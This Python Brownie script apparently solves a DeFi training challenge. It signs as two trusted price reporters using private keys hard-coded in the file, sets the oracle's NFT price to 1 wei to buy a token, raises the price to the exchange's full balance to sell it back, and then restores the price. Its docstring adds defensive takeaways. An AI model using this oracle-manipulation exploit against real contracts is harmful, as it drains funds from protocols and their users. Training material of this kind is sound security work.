from brownie import DamnValuableNFT, Exchange, TrustfulOracle, accounts
from scripts.deploy import EXCHANGE_INITIAL_ETH_BALANCE, INITIAL_NFT_PRICE
# Private keys for the two reporter accounts that exploit() loads through
# accounts.add(). They are committed in plain text, so treat them as
# publicly known fixture values for this exercise only: a key that appears
# in a repository must never guard a real account or real funds.
COMPROMISED_PRIVATE_KEY_1 = '0xc678ef1aa456da65c6fc5861d44892cdfac0c6c8c2560bf0c9fbcdae2f4735a9'
COMPROMISED_PRIVATE_KEY_2 = '0x208242c40acdfa9ed889e685c23547acbed9befc60371e9875fbcd736340bb48'
def exploit(oracle_contract, exchange_contract, dvnft_contract, attacker_account):
    """Replay the oracle price-manipulation scenario against the test deployment.

    Both hard-coded reporter keys are loaded as signing accounts and used to
    post 'DVNFT' prices to the oracle in three phases: a price of 1 before a
    buy, EXCHANGE_INITIAL_ETH_BALANCE + 1 before the sell, and
    INITIAL_NFT_PRICE at the end to put the starting price back.

    Args:
        oracle_contract: Oracle exposing ``postPrice(symbol, price, tx_params)``.
        exchange_contract: Exchange exposing ``buyOne`` and ``sellOne``.
        dvnft_contract: NFT contract; used here only for ``approve``.
        attacker_account: Account that signs the buy, approve and sell calls.

    Returns:
        None. Every effect is an on-chain transaction.

    Defensive takeaway (NOTE(review): the oracle and exchange sources are not
    visible here, so the aggregation rule is assumed): if two reporter keys
    are enough to set the price the exchange trades at, then the custody of
    those keys is the whole trust boundary. Monitoring for abrupt price
    swings and for reporters posting in lockstep is a natural detection
    point; more independent reporters and deviation bounds on accepted
    prices are the usual mitigations.
    """
    # The two keys belong to trusted price sources; turn each into an account
    # that can sign transactions, in the same order they are declared.
    reporters = [
        accounts.add(private_key)
        for private_key in (COMPROMISED_PRIVATE_KEY_1, COMPROMISED_PRIVATE_KEY_2)
    ]

    def post_price(price):
        # One postPrice transaction per reporter, always in the same order.
        for reporter in reporters:
            oracle_contract.postPrice('DVNFT', price, {'from': reporter})

    # Phase 1: report a price of 1, then buy a single token for 1 wei.
    post_price(1)
    purchase_tx = exchange_contract.buyOne({'from': attacker_account, 'value': 1})
    # The minted token's id is read from the Transfer event of the purchase.
    token_id = purchase_tx.events['Transfer']['tokenId']

    # Phase 2: report the exchange's initial balance plus one, then sell the
    # token back. The exchange must be approved to move the token first.
    post_price(EXCHANGE_INITIAL_ETH_BALANCE + 1)
    dvnft_contract.approve(exchange_contract, token_id, {'from': attacker_account})
    exchange_contract.sellOne(token_id, {'from': attacker_account})

    # Phase 3: report the original price again so the oracle ends where it began.
    post_price(INITIAL_NFT_PRICE)